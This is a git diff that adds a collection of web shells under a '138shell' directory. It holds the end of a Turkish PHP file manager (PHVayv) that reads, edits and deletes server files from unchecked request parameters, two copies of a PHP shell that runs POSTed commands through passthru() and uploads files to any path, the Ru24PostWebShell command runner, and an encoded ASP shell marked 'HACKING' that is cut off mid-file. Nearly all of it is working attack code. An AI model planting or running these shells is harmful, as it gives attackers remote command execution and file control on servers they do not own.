+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber30" height="184">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="144">
+    <form method="POST" action="<?echo "$fistik.php?yeniklasor=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="37" maxlength="32"
+                name="duzenx2" value="Klasör Adı"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanıcı'"
+                onfocus="if (this.value == 'Kullanıcı') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center">
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></b></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+<?if ($yendos>"") {;
+?>
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="495">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="455">
+    <form method="POST" action="<?echo "$fistik.php?yenidosya=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="50" maxlength="32"
+                name="duzenx2" value="Dosya Adı"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanıcı'"
+                onfocus="if (this.value == 'Kullanıcı') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-CENTER: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span><br>
+&nbsp;</p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+
+<?if ($duzenle>"") {; 
+?>
+
+
+
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="1">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="1"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan Dosya</span></font></td>
+        <td bgcolor="#D6D6D6" height="1">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4" height="19">
+          <tr>
+            <td width="1" height="19"></td>
+            <td rowspan="2" height="19"><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin/$duzenle"?></font></td>
+          </tr>
+          <tr>
+            <td width="1" height="1"></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F">
+    <form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle&dizin=$dizin"?>" name="kaypos">
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <br>
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF"><?$baglan=fopen("$dizin/$duzenle",'r');
+while(! feof ( $baglan ) ){
+$okunan=fgets($baglan,1024);
+echo $okunan;
+} fclose($baglan); ?></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    &nbsp;</td>
+  </tr>
+  </table>
+
+
+
+
+
+
+
+
+
+
+
+<?
+} else {
+?>
+
+
+
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>PHVayv 1.0</title>
+</head>
+
+<body topmargin="0" leftmargin="0">
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+
+
+
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan Klasör</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
+              <tr>
+                <td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13"
+                onmouseover='this.style.background="D9D9D9"'
+                onmouseout='this.style.background="9F9F9F"'
+                style="CURSOR: hand"
+                
+                
+                
+                
+                >
+                <p align="center"><font face="Verdana" style="font-size: 8pt">
+
+
+
+
+
+
+                <a href="<?echo "$fistik.php?dizin=$dizin/../"?>" style="text-decoration: none">
+                <font color="#000000">Üst Klasör</font></a></font></td>
+
+              </tr>
+            </table>
+            </td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+
+
+
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
+  <tr>
+    <td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
+  </tr>
+  <tr>
+    <td bgcolor="#000000" height="20">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
+      <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        
+        height="19" bordercolor="#000000">
+        <span style="font-weight: 700">
+        <font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+        <a color="#9F9F9F" target="_blank" href="<?echo "$fistik.php?sistembilgisi=1";?>" style="text-decoration: none"><font color="#9F9F9F">Sistem Bilgisi</font></a></font></font></span></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yenklas=1&dizin=$dizin";?>" style="text-decoration: none">
+        <font color="#9F9F9F">Yeni Klasör</font></a></font></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19"
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+		bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yendos=1&dizin=$dizin";?>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+  </table>
+
+  
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Tür</font></td>
+    <td height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya 
+    Adı</font></td>
+    <td width="122" height="17" bgcolor="#9F9F9F">
+    <p align="center">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;İşlem</font></td>
+  </tr>
+</table>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_dir("$dizin/$ekinci")){
+?>
+
+<? if ($ekinci=="." or  $ekinci=="..") {
+} else {
+?>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#808080">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
+    <td height="17" bgcolor="#C4C4C4">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font></td>
+    <td width="61" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?dizin=$dizin/" ?><?echo "$ekinci";?>" style="text-decoration: none">
+        <font color="#000000">Aç</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+
+
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?silklas=$dizin/$ekinci&dizin=$dizin"?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a>
+
+        </font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+<?
+}
+?>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_file("$dizin/$ekinci")){
+
+?>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
+  <tr>
+    <td width="30" height="1" bgcolor="#B0B0B0">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
+    <td height="1" bgcolor="#EAEAEA">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font>
+    <font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;   ( XXX )&nbsp;</font></td>
+    <td width="61" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6"
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a style="text-decoration: none" target="_self" href="<?echo "$fistik";?>.php?duzenle=<?echo "$ekinci";?>&dizin=<?echo $dizin;?>">
+        <font color="#000000">Düzenle</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="100%">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik";?>.php?sildos=<?echo $ekinci;?>&dizin=<?echo $dizin;?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    </body></html><? } ?><? } ?><? } ?><? } ?>
\ No newline at end of file
diff --git a/138shell/P/pws.php.txt b/138shell/P/pws.php.txt
new file mode 100644
index 0000000..cf979a1
--- /dev/null
+++ b/138shell/P/pws.php.txt
@@ -0,0 +1,35 @@
+<html>
+<head>
+<div align="left"><font size="1">Input command :</font></div>
+<form name="cmd" method="POST" enctype="multipart/form-data">
+<input type="text" name="cmd" size="30" class="input"><br>
+<pre>
+<?php
+if ($_POST['cmd']){
+$cmd = $_POST['cmd'];
+passthru($cmd);
+}
+?>
+</pre>
+<hr>
+<div align="left"><font size="1">Uploader file :</font></div>
+
+<?php
+$uploaded = $_FILES['file']['tmp_name'];
+if (file_exists($uploaded)) {
+   $pwddir = $_POST['dir'];
+   $real = $_FILES['file']['name'];
+   $dez = $pwddir."/".$real;
+   copy($uploaded, $dez);
+   echo "FILE UPLOADED TO $dez";
+}
+?>     </pre>
+<form name="form1" method="post" enctype="multipart/form-data">
+ <input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>">
+ <input type="submit" name="submit2" value="Upload">
+ <input type="file" name="file" size="15">
+	  </td>
+    </tr>
+</table>
+</body>
+</html>
diff --git a/138shell/P/pws.txt b/138shell/P/pws.txt
new file mode 100644
index 0000000..cf979a1
--- /dev/null
+++ b/138shell/P/pws.txt
@@ -0,0 +1,35 @@
+<html>
+<head>
+<div align="left"><font size="1">Input command :</font></div>
+<form name="cmd" method="POST" enctype="multipart/form-data">
+<input type="text" name="cmd" size="30" class="input"><br>
+<pre>
+<?php
+if ($_POST['cmd']){
+$cmd = $_POST['cmd'];
+passthru($cmd);
+}
+?>
+</pre>
+<hr>
+<div align="left"><font size="1">Uploader file :</font></div>
+
+<?php
+$uploaded = $_FILES['file']['tmp_name'];
+if (file_exists($uploaded)) {
+   $pwddir = $_POST['dir'];
+   $real = $_FILES['file']['name'];
+   $dez = $pwddir."/".$real;
+   copy($uploaded, $dez);
+   echo "FILE UPLOADED TO $dez";
+}
+?>     </pre>
+<form name="form1" method="post" enctype="multipart/form-data">
+ <input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>">
+ <input type="submit" name="submit2" value="Upload">
+ <input type="file" name="file" size="15">
+	  </td>
+    </tr>
+</table>
+</body>
+</html>
diff --git a/138shell/P/ru24_post_sh.txt b/138shell/P/ru24_post_sh.txt
new file mode 100644
index 0000000..5600c64
--- /dev/null
+++ b/138shell/P/ru24_post_sh.txt
@@ -0,0 +1,23 @@
+<?php
+/*
+Ru24PostWebShell
+Writed by DreAmeRz
+
+http://www.ru24-team.net
+*/
+error_reporting(0);
+$function=passthru; // system, exec, cmd
+echo "<html>
+<head>
+<title>Ru24PostWebShell - ".$_POST['cmd']."</title>
+<meta http-equiv='pragma' content='no-cache'>
+</head><body>";
+echo "<form method=post>";
+echo "<input type=text name=cmd size=85>";
+echo "</form>";
+echo "<pre>";
+if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
+echo "".$function($_POST['cmd'])."</pre></body></html>";
+
+
+?>
diff --git a/138shell/R/Rader.asp.txt b/138shell/R/Rader.asp.txt
new file mode 100644
index 0000000..6cec6a0
--- /dev/null
+++ b/138shell/R/Rader.asp.txt
@@ -0,0 +1,116 @@
+<%@ LANGUAGE = VBScript.Encode %>
+
+
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Language" content="tr">
+<!--
+         
+            
+            
+             HACKING 
+              Mehdi & HolyDemon
+                 www.infilak.tr.cx & www.infilaktim.tk
+           
+-->
+<%#@~^FAAAAA==G	PnMDKDPM+k;:PU+XYtwcAAA==^#~@%> 
+<%#@~^2QgAAA==@#@&w.K{	l:P{~JU+^DYor^+/r@#@&HlybsCD,',J@!Vr@*&RHRw~JLw.G|xlhnLJ~?1.bwObxbP|!V^Cx9ığıxı"Pİçbx~Pş+30ü.PAN+Mr"R@!Vb@*~A;~Um.kaOk	P3U,Öx+hsbPÖ"+^sbğk~"l0kw^+MrPVk8k,|CzıDP`^Go*P@!(.@*Y!Yslhldı[ıMR R@!sk@*A;~UmDr2DkUPgCkıV~nE^Vl	ıVm^lğı,5CD9ı:~$ö^ü:üx9nPt+\1;OY!D,rVEz;aYCP_CVmP)U^l:C"klUıy,ASh bx6kVm3cODcmaPUkOnkkxbUPwWD!h~Aö^ü:ü	Nnx~)HDıUYı^ı~AbVLrHkP$;^l8k^rM/r	k.RR,@!^r@*Il.NısP#n,f+kO+0V+MrUNx,fGVCzı,CGVH9+sWU~j+P3VKDG:mUEl~ÇKW0PKş+0VüD,2[+Mkh c@!Vb@*?1DkaOr:bybP!ü\nU^+~|!sVmxC8bVk.dbxryc @!Vr@*|!VVmxıs~Cm3Vıx9l~!xkş,$k^ok,)s:m3,İçkUP( gRoPz[:bx~#Xl~!öM+-VbsDrHVPMöMüşüxü. R@!4.@*@!4.@*@!4D@*@!4M@*@!(.@*@!(D@*@!8D@*@!(D@*@!(.@*@!0GUDPmGsKDxD[@*@!^xD+D@*@!(@*A`P$İI,q HcsPU6s:P5zt(S&H&f(I @!J4@*@!(.@*@!4.@*@!0WUO,mGVK.{4s!+@*$P_l0~MV[k,ACOı^P}mrV,rV9;~T@!4M@*@!t.~1WsWMx4^l^V,/k"n{G@*@!(.@*@!^xD+D@*@!m~tM+W'4YO2=zzSAhckx6rsl0RDD ma@*qh	R&UsbSCVcKD /o@!&l@*'	4daiLx4kwp'x(/2iLx8dai[	8/ai[	8dwp@!mP4DnW{tOYalzJhAAc+3G.K:Cxch3C	kcmWs@*AVWMWhl	R\n0lxb ZK:@!JC@*[	4kwI[U8kwI[	8/ai'U(/wI'	4dwp'	4dai@!lP4DW'4YOw=z&AShR0CDkWxWdl	+kk YV@*nl./KU26/CU/k O0@!&l@*'	4daiLx4kwp'x(/2iLx8dai[	8/ai[	8dwp@!(D@*@!8.@*@!CP4.+6'hCbVYGlslrV(Gs4@$4WD:lbVc^Ws@*\+4Nr@!Jl@*LU4kwiLU8/aiLx8/2ILx8/aI[	4d2p[x8dai@!l,4M+W{:mkVDW=4W^X[+sWU@$4WYsCk^RmKh@*CKVHfn:GU@!zC@*LU4kwI'	4/2ILx8/aILx8kwp[x(/aI[	4dwp@!C~4D+6x:mkVDGl+M3mxqc*@$sXU+D mK:@*30WDGhmx@!zm@*@!4.@*@!(D@*@!l,4D0xtDY2lJzhSARbx0bsC3cYMR^6@*(c1 s@!&l@*J@#@&4+V2~{PEA!~km.bwDPHt9rP:l.l6ıx[C	PqcHRwPKChPzNı	l~5C"ı^:ışOıDc@!4M@*@!sb@*Üm.nDVrPjn,Üm.Ykky,bk2P_WdY^l.ıU,Kü:ü	[+,ÇlVışıM  